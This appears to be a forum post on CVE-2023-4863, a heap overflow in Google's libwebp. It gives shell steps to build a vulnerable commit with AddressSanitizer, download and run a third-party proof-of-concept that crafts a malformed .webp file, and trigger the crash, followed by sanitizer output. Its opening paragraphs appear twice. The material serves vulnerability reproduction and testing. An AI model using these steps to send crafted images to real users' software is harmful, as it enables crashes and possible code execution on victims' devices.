10-04-2023, 06:57 AM
The libwebp
library processes images using the .webp format. It was created over a decade ago by Google and is used in most applications that render .webp images. The vulnerability may be exploited using a maliciously crafted .webp lossless file, which causes the vulnerable library to overflow.
Attacks against this vulnerability can range from denial of service (DoS) to possible remote code execution (RCE). As an example, closely related attacks such as the 0-day BLASTPASS exploit (Apple CVE-2023-41064,CVE-2023-41061) showed that malicious .webp images sent through the iMessage system could compromise a victim’s iOS device without any interaction by its owner.
A POC for CVE-2023-4863. NOT an exploit
library processes images using the .webp format. It was created over a decade ago by Google and is used in most applications that render .webp images. The vulnerability may be exploited using a maliciously crafted .webp lossless file, which causes the vulnerable library to overflow.
Attacks against this vulnerability can range from denial of service (DoS) to possible remote code execution (RCE). As an example, closely related attacks such as the 0-day BLASTPASS exploit (Apple CVE-2023-41064,CVE-2023-41061) showed that malicious .webp images sent through the iMessage system could compromise a victim’s iOS device without any interaction by its owner.
A POC for CVE-2023-4863. NOT an exploit
# checkout webp
$ git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
$ cd webp_test/
# checkout vulnerable version
$ git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
# enable AddressSanitizer
$ sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
# build webp
$ make -f makefile.unix
$ cd examples/
# fetch mistymntncop's proof-of-concept code
$ wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
# build and run proof-of-concept
$ gcc -o craft craft.c
$ ./craft bad.webp
# test trigger file
$ ./dwebp bad.webp -o test.png
=================================================================
==207551==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x56196a11635a bp 0x7ffd3e5cce90 sp 0x7ffd3e5cce80
WRITE of size 1 at 0x626000002f28 thread T0
#0 0x56196a116359 in BuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359)
#1 0x56196a1166e7 in VP8LBuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb66e7)
#2 0x56196a0956ff in ReadHuffmanCode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x356ff)
#3 0x56196a09a2b5 in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a2b5)
#4 0x56196a09e216 in VP8LDecodeHeader (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3e216)
#5 0x56196a0a011b in DecodeInto (/home/isosceles/source/webp/webp_test/examples/dwebp+0x4011b)
#6 0x56196a0a2f06 in WebPDecode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x42f06)
#7 0x56196a06c026 in main (/home/isosceles/source/webp/webp_test/examples/dwebp+0xc026)
#8 0x7f7ea8a8c082 in __libc_start_main ../csu/libc-start.c:308
#9 0x56196a06e09d in _start (/home/isosceles/source/webp/webp_test/examples/dwebp+0xe09d)
0x626000002f28 is located 0 bytes to the right of 11816-byte region [0x626000000100,0x626000002f28)
allocated by thread T0 here:
#0 0x7f7ea8f2d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x56196a09a0eb in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a0eb)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) in BuildHuffmanTable
...
![[Image: banner.png]](https://external-content.duckduckgo.com/iu/?u=https://cdn.discordapp.com/attachments/1125919513599283292/1148391682782547978/banner.png)